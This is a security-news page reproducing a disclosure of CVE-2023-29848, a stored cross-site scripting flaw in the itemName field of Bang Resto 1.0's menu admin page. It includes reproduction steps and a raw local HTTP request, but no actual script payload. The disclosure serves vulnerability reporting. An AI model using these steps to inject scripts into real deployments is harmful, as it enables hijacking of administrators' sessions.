Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-29848: Bang Resto 1.0 Cross Site Scripting ≈ Packet Storm

Bang Resto 1.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the itemName parameter in the admin/menu.php Add New Menu function.

CVE
Open in Source
#xss#vulnerability#web#windows#apache#js#git#php#auth#firefox
# Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)# Date: 2023-04-02# Exploit Author: Rahad Chowdhury# Vendor Homepage:https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html# Software Link:https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip# Version: 1.0# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-29848*Steps to Reproduce:*1. First login to your admin panel.2. then go to Menu section and click add new menu from group.your request data will be:POST /bangresto/admin/menu.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/111.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 87Origin: http://127.0.0.1Referer: http://127.0.0.1/bangresto/admin/menu.phpCookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6Connection: closeitemName=test&itemPrice=1&menuID=1&addItem=3. Then use any XSS Payload in "itemName" parameter and click add.4. You will see XSS pop up.

Related news

Bang Resto 1.0 Cross Site Scripting

Bang Resto version 1.0 suffers from a cross site scripting vulnerability.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE